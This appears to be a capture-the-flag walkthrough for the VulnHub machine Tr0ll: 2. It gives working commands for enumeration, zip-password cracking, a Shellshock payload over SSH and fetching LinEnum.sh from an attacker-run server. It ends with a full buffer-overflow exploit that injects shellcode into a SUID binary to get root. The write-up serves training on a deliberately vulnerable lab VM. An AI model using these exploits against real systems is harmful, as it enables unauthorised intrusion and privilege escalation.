VulnHub: Tr0ll: 2

Tr0ll: 2

Initial Foothold

1. Network discovery

nmap -sn 10.0.2.27/24

My target is 10.0.2.30.

2. Port scan

nmap -Pn 10.0.2.30
nmap -Pn -p1000- 10.0.2.30

3. OS and service scan

nmap -A -p21,22,80 10.0.2.30

There’re 3 services: ftp, ssh, and http.

4. Vuln scan

nmap --script vuln -p21,22,80 10.0.2.30

There’s a ‘robots.txt’ file.

Service Enumeration

There’re 3 TCP services:

• 21/tcp ftp vsftpd 2.0.8 or later

Connect

ftp 10.0.2.30

There’s a banner.

• 22/tcp ssh OpenSSH 5.9p1 Debian 5ubuntu1.4

Connect

ssh 10.0.2.30

• 80/tcp http Apache httpd 2.2.22 ((Ubuntu))

1. Nikto scan

nikto -h http://10.0.2.30

2. Directory scan

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.30/ -x php,txt,html,sh,cgi -q

3. Access the site

View page source. There’s a possible username: Tr0ll.

Save it as ‘user.txt’ in case I need to use it.

Access robots.txt

Copy only directory list and save it as ‘robots_fix.txt’

4. Enum site’s directory w/ robots_fix.txt

gobuster dir --wordlist http/robots_fix.txt -u http://10.0.2.30/ -x php,txt,html,sh,cgi -q

There are only 4 directories that I can access. Others are trolls.

I started w/ ‘ok_this_is_it’. There’s a page w/ one image.

View page source

Save the image and analyze its metadata

exiftool cat_the_troll.jpg

The file size is 15 KiB.

Search for any hidden messages.

strings

I kept repeating the steps of all path, ’til /dont_bother/

I noticed that its file size is 16 KiB which is different from others.

Use ‘strings’ to search for hidden message and there it is.

6. Access ‘y0ur_self’

There’s an ‘answer.txt’ file.

Read it. It is base-64 encoded strings. Some of them are the same string.

Download it.

wget http://10.0.2.30/y0ur_self/answer.txt

Remove redundancy string.

sort answer.txt | uniq > new_answer.txt
cat new_answer.txt

Now It is better.

Decode it w/ cyberchef. It can import files, so it is super convenient. After decoding, I saved it as ‘decoded_answer.txt’.

Read the file

cat decoded_answer.txt

It’s a password for something.

Find an access to the machine

Now that I don't have any shell yet. There’re 2 services that need credentials: FTP and SSH.

So far I have one username: Tr0ll and a list of passwords.

1. Starting w/ FTP, connect to the service again.

Sometimes FTP user doesn't require a password.

ftp 10.0.2.30
username: Tr0ll
password: (empty)

FAiled

Use the same username and password to log in. This time I succeeded.

username: Tr0ll
password: Tr0ll
ls -la

There’s ‘lmao.zip’.

Download it

get lmao.zip

Unzip it.

unzip lmao.zip

I stuck w/ password requiring.

Crack it w/ fcrackzip. I already have passwords that I can use to crack

fcrackzip -u -v -D -p http/y0ur_self/decoded_answer.txt lmao.zip

Now I got the password.

unzip lmao.zip
password: <cracked password>
ls

I got the new file, ‘noob’.

Read it

cat noob

It’s a private key for SSH service.

2. Login to SSH service

Change noob permission

chmod 600 noob

Starting w/ ‘Tr0ll’

ssh -i noob Troll@10.0.2.30

It still requires a password.

I guess that username may be ‘noob’. Let’s change the username to ‘noob’

ssh -i noob noob@10.0.2.30

The connection was closed immediately after logging in.

Try shellshock technique w/ SSH

ssh -i noob noob@10.0.2.30 '() { :;}; /bin/bash'
id
python -c 'import pty;pty.spawn("/bin/bash");'

Now I got the shell. And I need TTY shell to work around the machine.

Privilege Escalation

1. Explore directories as listed:

/home
/tmp
/opt
/var
/var/www/html

I don't find anything in these directories.

2. Verify sudo permission

sudo -l

I need a password.

3. LinEnum.sh

Prepare HTTP server on the attacker machine

python -m SimpleHTTPServer 80

Download it

cd /tmp
wget http://10.0.2.27/LinEnum.sh
chmod 777 LinEnum.sh

Run it

./LinEnum.sh

From the bottom to the top. Here are the things that I’ve found interesting.

noob’s ‘.bash_history’. Maybe a hint to Buffer Overflow (bof).

SUID files. The last 3 records are the leads.

Access it

cd /nothing_to_see_here/choose_wisely
ls -la

There’re 3 directories.

door1

cd door1
ls -la

There’s r00t.

door2

cd ../door2
ls -la

There’s r00t.

door3

cd ../door3
ls -la

There’s r00t.

Try run it

./r00t

My connection is closed after few seconds. I have to repeat the connection step.

Let’s try door2

./r00t

I have to supply input.

./r00t test

Maybe I can do the buffer overflow.

Buffer Overflow

1. fuzzing

./r00t $(python -c 'print "A"*500' )

There’s a segmentation fault. I can proceed to the next step

2. Find EIP offset

Create a pattern of 500 characters

msf-pattern_create -l 500

Open r00t w/ gdb

gdb ./r00t

Supply the created pattern

r <created pattern>

EIP address is 0x6a413969

Find the offset

msf-pattern_offset -l 500 -q <EIP address>
in my case:
msf-pattern_offset -l 500 -q 6a413969

EIP offset is 268.

3. Find ESP address

Back to the gdb

i r esp

The esp address is ‘0xbffffac0’

4. Overwriting EIP and confirm the offset

Quit the gdb and restart the program

quit

./r00t

After quitting r00t is dissappeared.

List the file.

ls -la

Nothing

Try to run r00t in door3

./r00t

Back to door2

ls -la

Permission denied

Now I think that this machine has some hidden script to troll w/ me as making it harder, cease the connection, and make the file disappear.

I can use another command to verify this directory

stat r00t

Now I got the same file.

Open w/ gdb

gdb ./r00t

Confirm the offset

r $(python -c 'print "A"*<offset number> + "B"*4' )
in mycase:
r $(python -c 'print "A"*268 + "B"*4' )

Now I got 0x42424242 (“B*4”), which means the offset is correct.

5. Exploitation

I got the /bin/sh shellcode from here:

Linux/x86 - execve /bin/sh shellcode - 23 bytes

./r00t $(python -c 'print "A"*<offset number> +   "<ESP address>" + "\x90" * 10 + "<shellcode>"')
in my case:
./r00t $(python -c 'print "A"*268 +   "\xc0\xfa\xff\xbf" + "\x90" * 10 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')

NOTE: “\x90” * 10 is NOPS.

id
whoami

Now, I’m root.

cd /root
ls -la
cat Proof.txt